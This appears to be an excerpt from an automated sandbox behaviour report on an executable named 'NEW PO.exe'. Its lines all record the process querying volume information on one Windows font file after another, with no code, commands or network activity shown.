Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
